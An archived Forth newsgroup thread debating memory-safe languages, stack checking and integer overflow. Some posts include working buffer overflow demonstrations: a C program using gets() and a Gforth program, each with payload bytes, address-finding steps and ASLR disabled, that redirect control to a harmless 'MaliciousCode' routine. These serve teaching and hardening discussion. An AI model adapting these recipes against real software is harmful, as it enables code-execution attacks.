They put out for proposals for a new language to be designed. The
eventual winner was Ada, but that choice came with some controversy at
the time. There were competing proposals that some people felt were
less bloated and still fulfilled the intended goals.

minforth

2024-03-03 20:00:27 UTC

Post by Paul Rubin
They put out for proposals for a new language to be designed. The
eventual winner was Ada, but that choice came with some controversy at
the time. There were competing proposals that some people felt were
less bloated and still fulfilled the intended goals.

Misra-C is an example. There is no language specification, but quite a
number of rules against which a C program can be checked.

Paul Rubin

2024-03-03 22:08:29 UTC

Post by minforth
Misra-C is an example. There is no language specification, but quite a
number of rules against which a C program can be checked.

Misra-C has some sensible rules, but it's still C, which comes nowhere
near meeting the requirements that the working group (that chose Ada)
was looking for. Maybe some subset of C++ could have done done it.
C doesn't have nearly enough type safety.

Krishna Myneni

2024-03-03 12:58:02 UTC

Post by Anton Ertl
*the terminal*:3:13: error: Floating-point stack overflow
*the terminal*:4:8: error: Floating-point stack underflow

Yes, that is not their intention and not the intention of these
examples. The intention of these examples is to show that any memory
access will be interpreted as a stack underflow or overflow if it is
to a certain range of addresses.
A more serious issue is that, as implemented in Gforth (in particular,
gforth-fast), stack underflows can be undetected in some cases: On
600 pick ok 1
: foo 600 0 ?do nip loop cr . ; foo
0
*the terminal*:1:33: error: Stack underflow
: foo 600 0 ?do nip loop cr . ; >>>foo<<<
kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw
Note that FOO actually performs the "cr .", so the stack underflow is
not detected by an access to the the guard page. Instead, the text
interpreter checks the stack pointer and reports a stack underflow.
The non-detection of the stack underflow is because NIP is implemented
$7F30E3C72C90 nip 1->1
7F30E3917557: add r13,$08 #update sp
With the gforth engine, a similar scenario (involving DROP) is avoided
because in this engine DROP loads the value being dropped exactly to
$7F55EBFA6C98 drop 0->0
7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
7F55EBAC51C4: add r15,$08 #update ip
7F55EBAC51C8: mov rax,[r14] #load dropped value
7F55EBAC51CB: add r14,$08 #update sp
Neither the deep PICK nor the loop that just NIPs or DROPs occur in
practice.
The motivation for the otherwise unnecessary load in DROP (in gforth)
is code sequences like
drop 1
in cases where the stack is empty. The load in DROP results in
detecting the stack underflow at the DROP rather than at the "1".
Reporting a stack underflow at an operation that just pushes can
produce a WTF moment in the programmer; the gforth engine exists to
make debugging easier, and that includes avoiding such moments.

That's a pretty good approach, to use guard pages for stack access words
which are guaranteed to trigger a signal, and use bounds checking for
the remaining ones.

The intent of the stack array access was to avoid stack pointer
arithmetic altogether. Stack array access words provide a safe alternate
to doing stack pointer arithmetic in Forth code. Pointer arithmetic
appears to be the source of a lot of memory safety problems.

--
Krishna

Anton Ertl

2024-03-03 15:51:07 UTC

Post by Krishna Myneni
The intent of the stack array access was to avoid stack pointer
arithmetic altogether. Stack array access words provide a safe alternate
to doing stack pointer arithmetic in Forth code. Pointer arithmetic
appears to be the source of a lot of memory safety problems.

At the machine level and the standard Forth level, every array access
performs address arithmetics. Given that standard Forth does not
expose the implementation of the stacks, there is no need to use some
specific implementation for them. One may wonder, though, if using 4
stacks with guard pages around them (i.e., at least 9 pages per task,
set up with 6 system calls) is too expensive for multi-tasking; I
think Gforth currently only does it for the main task.

There are architectures (in particular, the 80286) that provide
hardware support for treating stretches of memory as segments with
bounds checking, and the idea probably was that every array becomes a
segment (not sure about structures; the 80286 supports only 8192
segments, which seems a little low if every struture needs a segment),
but anyway, using segments was too cumbersome, slow and limited, so
they have been let slide by the wayside in the descendents of the
architecture (IA-32, AMD64).

In any case, yes, in Safe Forth there are no addresses at the language
level. You have objects with value-flavoured fields, and arrays with
indexed-fetch and indexed-store words. But in the implementation of
Safe Forth, there will certainly be address arithmetics.

- anton

Anton Ertl

2024-03-02 16:36:26 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Depends on what you mean with "runtime checks". Gforth does not
compile extra code for stack depth checks, and yet:

: RT1 2 3e recurse ; ok
: RT2 drop fdrop recurse ; ok
rt1
*the terminal*:3:1: error: Floating-point stack overflow

rt1<<<

rt2
*the terminal*:4:1: error: Stack underflow

rt2<<<

Here's the code for the two words:

see-code rt1
$7FEEF9B56C60 lit 1->1
$7FEEF9B56C68 #2
7FEEF97FB523: mov $00[r13],r8
7FEEF97FB527: sub r13,$08
7FEEF97FB52B: mov r8,$08[rbx]
$7FEEF9B56C70 flit 1->1
$7FEEF9B56C78 #4613937818241073152
7FEEF97FB52F: add rbx,$20
7FEEF97FB533: movsd [r12],xmm15
7FEEF97FB539: movsd xmm15,-$08[rbx]
7FEEF97FB53F: sub r12,$08
$7FEEF9B56C80 call 1->1
$7FEEF9B56C88 RT1
7FEEF97FB543: mov rax,$08[rbx]
7FEEF97FB547: sub r14,$08
7FEEF97FB54B: add rbx,$10
7FEEF97FB54F: mov [r14],rbx
7FEEF97FB552: mov rbx,rax
7FEEF97FB555: mov rax,[rbx]
7FEEF97FB558: jmp eax
$7FEEF9B56C90 ;s 1->1
7FEEF97FB55A: mov rbx,[r14]
7FEEF97FB55D: add r14,$08
7FEEF97FB561: mov rax,[rbx]
7FEEF97FB564: jmp eax
ok
see-code rt2
$7FEEF9B56CC0 drop 1->1
7FEEF97FB566: mov r8,$08[r13]
7FEEF97FB56A: add r13,$08
$7FEEF9B56CC8 fdrop 1->1
7FEEF97FB56E: mov rax,r12
7FEEF97FB571: lea r12,$08[r12]
7FEEF97FB576: movsd xmm15,$08[rax]
$7FEEF9B56CD0 call 1->1
$7FEEF9B56CD8 RT2
7FEEF97FB57C: mov rax,$18[rbx]
7FEEF97FB580: sub r14,$08
7FEEF97FB584: add rbx,$20
7FEEF97FB588: mov [r14],rbx
7FEEF97FB58B: mov rbx,rax
7FEEF97FB58E: mov rax,[rbx]
7FEEF97FB591: jmp eax
$7FEEF9B56CE0 ;s 1->1
7FEEF97FB593: mov rbx,[r14]
7FEEF97FB596: add r14,$08
7FEEF97FB59A: mov rax,[rbx]
7FEEF97FB59D: jmp eax

Look, Ma, no software run-time checks. It's done with the MMU
hardware.

- anton

dxf

2024-03-03 01:58:04 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Garbage in, garbage out.

What do I use while developing a recursive function: ?STACK.
Chances of needing it in a completed application are about
the same as winning the lottery.

minforth

2024-03-04 11:06:05 UTC

Post by dxf
What do I use while developing a recursive function: ?STACK.

Yes and no:

Gforth 0.7.9_20200709
Authors: Anton Ertl, Bernd Paysan, Jens Wilke et al., for more type `authors'
Copyright © 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>
Gforth comes with ABSOLUTELY NO WARRANTY; for details type `license'
Type `help' for basic help
drop depth
*the terminal*:1:1: error: Stack underflow

drop<<< depth

: TEST drop depth ; ok
test <<<--- CRASH!!

Paul Rubin

2024-03-02 18:39:23 UTC

Post by dxf
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk'

If the misbehaviour is related to the program input, and the input is
supplied by an attacker, they will look for an input that breaks security.

Post by dxf
and how does 'memory-safe' prevent that?

"Prevent" is too strong a term, but it helps. A classic attack is when
you have a memory buffer on the stack, but accesses to it are not bounds
checked. That means the attacker can overwrite stuff on the stack after
the memory buffer, such as the procedure's return address. That means
the attacker can make the program jump to the location of their choice,
i.e. a location containing a security attack. See:

https://en.wikipedia.org/wiki/Return-oriented_programming

Post by dxf
That may be their belief (fancy word for hope) but do they have anything
to back it up?

It's unclear what they mean, but it's certainly the case that studying
the historical corpus of CVE's tells us things about common types of
attacks. That tells us what areas need attention.

Regarding runtime checks: in C++, if you access an array as a[i], there
is no runtime check and thus there is a potential out-of-range memory
access. If you instead say a.at(i), there is a runtime check, so you
get the right result if the index is in range, but raise an exception
otherwise. What I've found in practice is that there is almost no
slowdown. I suspect that the memory access itself is slower than the
range check, even when it usually is within the cpu cache. So this says
runtime checks are usually worth the small cost.

minforth

2024-03-02 19:47:05 UTC

You can compile in DEBUG/RELEASE mode, whereby runtime checks
are no longer included in RELEASE mode. But these are quasi
pre-mortem traps, just like guard pages - they do not make Forth
safer as a language, for that it would need a-priori error traps.

An example:

: TE1 -1 dup c! ;

TE1 contains two errors: -1 is not a char and -1 is not a permitted
memory address. It must be possible to catch these during compilation.

Even the so vulnerable language C has assert macros for compiling
in DEBUG mode. In Forth, you have to create asserts yourself.

Anton Ertl

2024-03-02 22:29:49 UTC

Post by minforth
In Forth, you have to create asserts yourself.

Or you can use Gforth, which has them since at least gforth-0.2
(released 1996). See
<https://gforth.org/manual/Assertions.html#index-assert_0028>.

- anton

Krishna Myneni

2024-03-03 13:03:01 UTC

Post by minforth
You can compile in DEBUG/RELEASE mode, whereby runtime checks
are no longer included in RELEASE mode. But these are quasi
pre-mortem traps, just like guard pages - they do not make Forth
safer as a language, for that it would need a-priori error traps.
: TE1 -1 dup c! ;
TE1 contains two errors: -1 is not a char and -1 is not a permitted
memory address. It must be possible to catch these during compilation.

kForth, from its beginning, would never execute the C! in your example:

Ready!
: TE1 -1 dup c! ;
ok
TE1
Line 2: VM Error(-256): Not data type ADDR
TE1

It performs run-time type checking for address arguments, at about 15%
cost in speed for most benchmarks.

--
Krishna

Anton Ertl

2024-03-02 22:21:19 UTC

Post by Paul Rubin
It's unclear what they mean, but it's certainly the case that studying
the historical corpus of CVE's tells us things about common types of
attacks. That tells us what areas need attention.

My impression from reading articles like
<https://lwn.net/Articles/961978/> and the discussions after them is
that in recent years CVEs have become a metric for evaluating security
researchers, and, like any other metric, are therefore gamed. So
these days a statistic about CVEs tells us only what kind of bugs
which are assumed to be vulnerabilities are most often found by those
researchers.

Post by Paul Rubin
What I've found in practice is that there is almost no
slowdown. I suspect that the memory access itself is slower than the
range check, even when it usually is within the cpu cache.

On a modern OoO processor, if the program is dependence-bound rather
than resource-bound, the instructions for the range check cost very
little, because they do not add to the dependence chains in the usual
case (when the access is in range).

- anton

Krishna Myneni

2024-03-01 18:38:59 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

the ones that Paul Rubin mentioned.

--
km

Krishna Myneni

2024-03-02 05:16:53 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?

I played with a simple buffer overflow attack code in C, based on an
example I found at

https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

=== begin code ===
/*
Demonstrate buffer overflow exploit.
Adapted from the example at:

https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

Build with:
gcc -m32 -o exploit_demo exploit_demo.c

Normal run:
printf "abcdefg" | ./exploit_demo

Find the address of MaliciousCode() within the disassembled executable
objdump -S ./exploit_demo

from the listing above, note the 4-byte address of MaliciousCode
and put the address in the input string, from low-byte to high-byte.

Exploit Example: pass a string to overflow the buffer and run
exploit code
printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo

replace the address 0x08049186 above with the one you obtained
from objdump command.

The exploit will cause MaliciousCode() to execute.
*/

#include <stdio.h>
#include <stdlib.h>

void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}

void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}

int main() {
GetInput();
return 0;
}
=== end code ===

It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).

--
Krishna

Anton Ertl

2024-03-02 08:04:01 UTC

Post by Krishna Myneni
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).

Forth does not have an inherently unbounded input word like C's
gets(). And even typical C environments warn you when you compile
this code; e.g., when I compile it on Debian 11, I get:

|> gcc xxx.c
|xxx.c: In function âGetInputâ:
|xxx.c:12:10: warning: implicit declaration of function âgetsâ; did you mean âfgetsâ? [-Wimplicit-function-declaration]
| 12 | gets(buffer);
| | ^~~~
| | fgets
|/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
|xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and should not be used.

So, they removed gets() from stdio.h, and added a warning to the
linker. "man gets" tells me:

|_Never use this function_
|[...]
|ISO C11 removes the specification of gets() from the C language, and
|since version 2.16, glibc header files don't expose the function
|declaration if the _ISOC11_SOURCE feature test macro is defined.

And when I follow the recipe in the comments, the result is a
segmentation fault. Things like ASLR prevent such easy ways to
reliably perform arbitrary code execution. The attacker still might
try to repeat the attack using one of the possible target addresses,
and eventually the random-number generator will actually produce the
layout that the exploit is designed for. Moreover, attackers have
found other, less time-consuming ways to cope with ASLR. Bottom line:
ASLR makes attacks harder, but it does not prevent them.

Anyway, there are plenty of ways to corrupt a Forth system, e.g., by
using MOVE in an unsafe way, or by using (the non-standard) PLACE or
+PLACE with a target buffer that's smaller then 256 bytes (and for
+PLACE, I would not be surprised if there are implementations around
that even write beyond the 256-byte boundary).

If you want an example, here's one that targets the Gforth version I
am currently working with:

: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;

create buffer1 8 allot

:noname buffer1 96 stdin read-line . ; execute
bye

When I put this into a file xploit.fs and then perform

printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs

I get the following output:

This code is malicious!
It will not execute normally.

Here the "setarch `uname -m` -R" is used to disable ASLR. Attackers
typically have no way to run programs this way (or if they have, they
don't need such an exploit to execute arbitrary code), but they have
other ways to work around ASLR.

In the example above the mistake is easy to see, but these kinds of
mistakes still happen.

It would be safer if we had the convention that buffers are always
passed around with their lengths. Then we could have a defining word

safebuffer ( u "name" -- )
\ name execution: ( -- addr u )

and in the code above one would write

8 safebuffer buffer1

:noname buffer1 stdin read-line . ; execute
bye

and there could not be a buffer overflow exploit.

- anton

Anton Ertl

2024-03-02 09:57:01 UTC

Post by Anton Ertl
If you want an example, here's one that targets the Gforth version I
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ; execute
bye
When I put this into a file xploit.fs and then perform
printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs
This code is malicious!
It will not execute normally.

I forgot to give a recipe for the printf above:

insert

' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop

right before the execute, and the dumps contain the bytes you have to
put into the printf after the 80th byte, in that order. I.e.:

: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;

create buffer1 8 allot

:noname buffer1 96 stdin read-line . ;
' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
execute
bye

and run it with

echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs

For the particular Gforth at hand, this produces:

7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..

7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......

exactly the bytes in the printf above.

- anton

Krishna Myneni

2024-03-02 12:18:41 UTC

insert
right before the execute, and the dumps contain the bytes you have to
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ;
execute
bye
and run it with
echo|setarch `uname -m` -R gforth xploit.fs gforth xploit.fs
7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..
7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......
exactly the bytes in the printf above.

Nice example. I can't reproduce it with an older version of gforth
(0.7.9_20220120), but the proof of concept attack is going to be Forth
system-dependent.

Curious as to why you did not use standard ACCEPT for the illustration.

--
Krishna

Krishna Myneni

2024-03-02 12:41:57 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers
make of the renewed recent push for use of memory-safe languages.
Certainly Forth can add the type of contractual safety requirements
e.g., implementing bounds checking, of a "memory-safe language". Do we
need to work on libraries for these provisions?
Opinions?

I played with a simple buffer overflow attack code in C, based on an
example I found at
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
=== begin code ===
/*
   Demonstrate buffer overflow exploit.
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
      gcc -m32 -o exploit_demo exploit_demo.c
      printf "abcdefg" | ./exploit_demo
   Find the address of MaliciousCode() within the disassembled executable
      objdump -S ./exploit_demo
      from the listing above, note the 4-byte address of MaliciousCode
      and put the address in the input string, from low-byte to high-byte.
   Exploit Example: pass a string to overflow the buffer and run
exploit code
      printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
      replace the address 0x08049186 above with the one you obtained
      from objdump command.
   The exploit will cause MaliciousCode() to execute.
*/
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
        printf("This code is malicious!\n");
        printf("It will not execute normally.\n");
        exit(0);
}
void GetInput() {
        char buffer[8];
        gets(buffer);
        // puts(buffer);
}
int main() {
        GetInput();
        return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).
--
Krishna

Here's the output from two runs of the executable, the first with no
buffer overflow, and the second with buffer overflow.

=== begin test output ===
$ printf "abcdefg" | ./exploit_demo

$ printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
This code is malicious!
It will not execute normally.
$
=== end test output ===

I am using Fedora release 39, kernel version 6.7.5-200.fc39.x86_64, and
gcc version gcc (GCC) 13.2.1 20231205 (Red Hat 13.2.1-6)

--
Krishna

a***@spenarnc.xs4all.nl

2024-03-02 09:41:10 UTC

There is no way Forth can be a safe language in the sense of
algol/pascal/ada/go.
It is in the lane of assembler/Fortran/c.
The most that can be done implement a safe language on top of it,
that makes not a lot of sense.

Post by Krishna Myneni
Krishna Myneni

Groetjes Albert

Ron AARON

2024-03-03 05:54:49 UTC

One of the criteria for 8th was security -- among other things, making
it very difficult to do unsafe memory operations. Within 8th itself you
can't; but of course, with the FFI anything is possible.

dxf

2024-03-04 01:10:35 UTC

One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.

Has it paid off - by which I mean completed apps that out of the blue access
invalid memory? I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any. I wonder if it has something
to do with the practices employed in those other languages - such as the use
of third-party libraries which programmers use essentially on faith.

Ron AARON

2024-03-04 05:06:42 UTC

One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.

That's a good question, for which I don't have an answer nor even any
metrics on which to base one.

While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to detail
of the programmers, I think.

Since 8th is intended for "application programmers" who may have little
experience, and since one of its primary goals is "security", I've made
it difficult to smash memory -- whether on purpose or accidentally. Of
course, that makes it stray considerably from standard Forths.

TL;DR: I don't really know.

minforth

2024-03-04 07:39:36 UTC

Post by Ron AARON
While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to detail
of the programmers, I think.

I think it's also a question of the scale of the software. Forth programs
are usually microscopically small and manageable. Typical modern software
can reach gigabytes and must be created by a team of developers who sometimes
don't even work in the same place. The attack surface for errors is therefore
orders of magnitude larger. Then there is a need for many more a-priori
security functions already in the programming language and development tools,
followed by software engineering test procedures.

Ron AARON

2024-03-04 08:13:06 UTC

Yes, this too. Even when people are all in the same location, getting
everyone to work in the same direction and same style and follow the
rules can be challenging.

Anton Ertl

2024-03-04 07:57:14 UTC

Post by dxf
Has it paid off - by which I mean completed apps that out of the blue access
invalid memory?

Out of the blue? That's not how it happens.

Post by dxf
I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any.

If you don't look, or if you look in the wrong place, you don't see.
The fact that a primitive technique like throwing random input at a
program caused many supposedly-debugged programs to misbehave shows
that programmers have blind spots, especially when it comes to their
own programs. And this has nothing to do with "gigabytes of
software", this was already found at times when machines were so small
that sizes of large programs were on the order of kilowords
<https://en.wikipedia.org/wiki/Fuzzing#Early_random_testing>.

- anton

dxf

2024-03-05 04:37:24 UTC

Post by dxf
Has it paid off - by which I mean completed apps that out of the blue access
invalid memory?

Out of the blue? That's not how it happens.

Post by dxf
I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any.

Yes but asking the system to find errors isn't looking - it's covering
one's butt.

Paul Rubin

2024-03-05 05:17:21 UTC

Post by dxf
Yes but asking the system to find errors isn't looking - it's covering
one's butt.

If the implementer doesn't find them and the system doesn't find them,
that leaves them for the attackers to find. Wasn't that what you were
asking about? We are learning that the best way to prevent attackers
from finding such errors is to use tools (e.g. languages) that prevent
those errors from occurring in the first place.

dxf

2024-03-05 17:36:53 UTC

Post by dxf
Yes but asking the system to find errors isn't looking - it's covering
one's butt.

AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
Such "errors" are forgivable. Not so, programmers who either don't
know where something might overflow, or knowing, fail to address it.

Paul Rubin

2024-03-05 18:03:15 UTC

Post by dxf
AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
Such "errors" are forgivable. Not so, programmers who either don't
know where something might overflow, or knowing, fail to address it.

Humans make errors. The world's smartest mathematicians have published
proofs with mistakes. Today, there is a community that likes to
machine-check math proofs to make sure they are sound. It's the same
thing with memory-safe languages. We don't have practical ways to make
sure programs are free of all errors, but we can make sure they are free
of some common and significant types of them.

dxf

2024-03-06 00:30:32 UTC

Humans make errors. The world's smartest mathematicians have published
proofs with mistakes.

They don't make basic ones. By nature programming is defensive and
overflow would be high - if not at the top - of things a programmer
is continually evaluating. Here's a CLI app from several years ago:

https://pastebin.com/0B6kaYFJ

At no time during its writing did I consider hackers or inept users.
Responsible programming was all.

What does worry me is how programmers are being encouraged to fear
unknown terrors and to doubt their capacity to think or manage the
situation. It borders on the religious.

Paul Rubin

2024-03-06 00:54:24 UTC

Post by dxf
At no time during its writing did I consider hackers or inept users.
Responsible programming was all.

Very nice. Back in the 1980s all of us did that. Then something called
the internet came along, as did computerized banking and other systems
which attracted highly competent malicious and/or financially motivated
attackers. At that point, writing bulletproof code became not only much
harder, but also vitally important. You now must ensure not only that
your program can do what you intended, but that it can't do what you
didn't intend. Bruce Schneier[1] wrote about security engineering:

In many ways this is similar to safety engineering. ... But safety
engineering involves making sure things do not fail in the presence
of random faults: it’s about programming Murphy’s computer, if you
will. Security engineering involves making sure things do not fail
in the presence of an intelligent and malicious adversary who forces
faults at precisely the worst time and in precisely the worst
way. Security engineering involves programming Satan’s computer.
And Satan’s computer is hard to test.

[1] https://www.schneier.com/essays/archives/1999/11/why_computers_are_in.html

So sure, if you're claiming that 1980s programming didn't benefit from
memory safe languages, maybe you're right. Those of us who have to
program in the 21st century, though, need all the help we can get.

dxf

2024-03-06 01:22:58 UTC

Post by Paul Rubin
...
Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

minforth

2024-03-06 08:23:53 UTC

Post by Paul Rubin
...
Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Conficious said:
Use program that treats integer wraparound as good feature and find yourself in big heap of dung

dxf

2024-03-06 09:02:20 UTC

... Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Use program that treats integer wraparound as good feature and find yourself in big heap of dung

A 'memory-safe' system won't detect that. What now?

minforth

2024-03-06 09:32:29 UTC

... Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Use program that treats integer wraparound as good feature and find yourself in big heap of dung

A 'memory-safe' system won't detect that. What now?

Wrong separation. They are related:
https://www.securecoding.com/blog/integer-overflow-attack-and-prevention/

I've been bitten in the past. Among other things, I now often use
range values, unknown to standard Forth, e.g. as array indices.

dxf

2024-03-07 01:57:26 UTC

... Those of us who have to
program in the 21st century, though, need all the help we can get.

"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.

Use program that treats integer wraparound as good feature and find yourself in big heap of dung

A 'memory-safe' system won't detect that. What now?

https://www.securecoding.com/blog/integer-overflow-attack-and-prevention/

And as it says - not easy to detect. For example it's my experience one
can input an out-of-range integer into C and Forth compilers and neither
will notice. As a 16-bit user I tend to be more conscious of overflow -
and my sometimes questionable attempts at preventing them. Humans are
always looking for an easy way out. Programmers too and I'm no exception.
OTOH I've been too long at this game to fall for promises of a 'safe'
language.

Post by minforth
I've been bitten in the past. Among other things, I now often use
range values, unknown to standard Forth, e.g. as array indices.

Well, I make mistakes too. In the app I recently posted the following
code was meant to catch overflow from nonsense input:

groupcols @ grouprows @ * groupsize @ *
( size) dup gmax 1+ 1 within if
cr ." Groups must be 1.." gmax . ." chars" .abort
then dup to gsize ...

I suspect I knew I was taking a short-cut when I wrote it but figured
it would be good enough. Perhaps it was - for my use. But looking at
it again ISTM I should have written:

: ?GERR ( f -- ) if
cr ." Groups must be 1.." gmax u. ." chars" .abort
then ;

: GROUPCHECK ( -- )
groupcols @ groupsize @ um* ?gerr grouprows @ um* ?gerr
dup 1 gmax between not ?gerr to gsize ;

Paul Rubin

2024-03-08 02:25:57 UTC

For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.

These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to
program closer to the hardware.

Ron AARON

2024-03-08 05:10:55 UTC

For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.

These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.
IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to
program closer to the hardware.

Just as an aside, 8th also does that. Numbers automatically grow as
needed. Yes, it's slower than native integers/floats... but it's very
convenient, and most of the time nobody notices the difference in speed.

dxf

2024-03-08 08:28:35 UTC

For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.

These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.
IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to
program closer to the hardware.

Carl Sagan deplored how the current generation was being 'dumbed down'
and unable to even understand the issues...

Hans Bezemer

2024-03-08 17:40:49 UTC

Post by Paul Rubin
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

A better question is - what *doesn't* slow down Python? LOL!

Hans Bezemer

Anton Ertl

2024-03-09 11:30:56 UTC

Post by Paul Rubin
#1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.

Python (particularly CPython), however, does not seem to have gone for
efficient implementation; I don't know what they do for arbitrarily
large integers, but the inner interpreter was pretty monstrous last I
looked.

I have looked at the implementation of arbitrarily large integers in
OpenJDK (could be better) and in the BC engine of Racket (could also
be better, but the BC engine is on the back burner, and they have a
JIT compiler as the main engine, but I did not find out how it
implements arbitrarily large integers.

But integer overflow is orthogonal to memory safety.

There are many people who claim that wrapping behaviour for integer
overflow is a problem. Java defines the basic types int and long to
perform wraparound on overflow, and while Java has its own share of
vulnerabilities (most prominently Log4Shell), I am not aware of one
where the wraparound behaviour was involved (but then, I have not
looked).

- anton

minforth

2024-03-09 12:17:08 UTC

Years ago we had a crash with using old archived data files
in a more recent system. The old file format relied on having
max 64k (16bit) index size, while the evaluating system assumed
24bit, and so the index overflowed the allocated memory space.
In hindsight a trivial case, but it took a while to track it down.

Anton Ertl

2024-03-09 17:27:45 UTC

Post by minforth
Years ago we had a crash with using old archived data files
in a more recent system. The old file format relied on having
max 64k (16bit) index size, while the evaluating system assumed
24bit, and so the index overflowed the allocated memory space.

Sounds like it would be caught by a memory-safe language, no integer
overflow detection necessary; and it's actually not a case of integer
overflow.

- anton

Spiros Bousbouras

2024-03-09 12:46:07 UTC

On Sat, 09 Mar 2024 11:30:56 GMT

